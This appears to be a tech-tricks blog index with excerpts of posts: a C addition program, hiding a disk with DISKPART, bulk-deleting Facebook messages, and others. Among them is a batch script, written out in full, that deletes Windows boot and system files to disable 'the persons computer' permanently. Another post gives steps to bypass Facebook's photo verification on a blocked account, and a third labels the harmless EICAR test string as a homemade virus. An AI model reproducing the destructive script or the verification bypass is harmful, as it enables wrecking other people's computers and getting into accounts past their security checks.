C Program to Add Two Integers

Source Code /*C programming source code to add and display the sum of two integers entered by user */#include int main( ){ int num1, num2, sum; printf(“Enter two integers: “); scanf(“%d %d”,&num1,&num2); /* Stores the two integer entered by user in variable num1 and num2 */ sum=num1+num2; /* Performs addition and stores it in variableContinue reading “C Program to Add Two Integers”

Hiding A Volume/Disk Completely

  The following trick will enable you to hide any volume or disk you want for the sake of your privacy:- follow the given steps :-1. click on start.2. select run.3.Now type cmd.(this will open a command prompt)4.type the command DISKPART5.now type LIST VOLUME6.now we have to select the drive we want to hidefor exampleContinue reading “Hiding A Volume/Disk Completely”

Bypass the Facebook photo verification step easily….. ..

This is the new method you can easily bypass the Facebook photo verification:   Step 1>>       Goto Google image search. Step 2>>       Type Facebook+”name of first friend” copy from blocked account Step 3>>       You will find the picture if it is in that account  Step 4>>Continue reading “Bypass the Facebook photo verification step easily….. ..”

How to Delete/Remove All Facebook Messages at Once

    One of the most problems that Facebook users are facing, is when you are trying to delete all your Chat messages. It’s kind of impossible to do that especially when your Account is full of messages, unless you keep deleting one by one until you finish that, you may lose too much ofContinue reading “How to Delete/Remove All Facebook Messages at Once”

HOW TO SHUTDOWN A COMPUTER FOREVER

Copy the followingcode into your notepad@echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.iniSave it as “shutdown-forever.bat”. Just make sure ithas a .bat or .cmd extension.DONT RUN THE BATCH FILE ,YOUWONT RECOVER BACK AFTER YOURUN IT !!!This should shutdown the persons computer. It shutsContinue reading “HOW TO SHUTDOWN A COMPUTER FOREVER”

MAKE YOUR OWN VIRUS

You can also test your anti-virus program using notepad. Follow the steps below to know more Open Notepad. Copy the code give below in the notepad file:X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*Step 3: Save it with an .exe extension like testvirus.exeAs soon as you save this file, your anti virus program will detect the file (virus) instantly and will attempt toContinue reading “MAKE YOUR OWN VIRUS”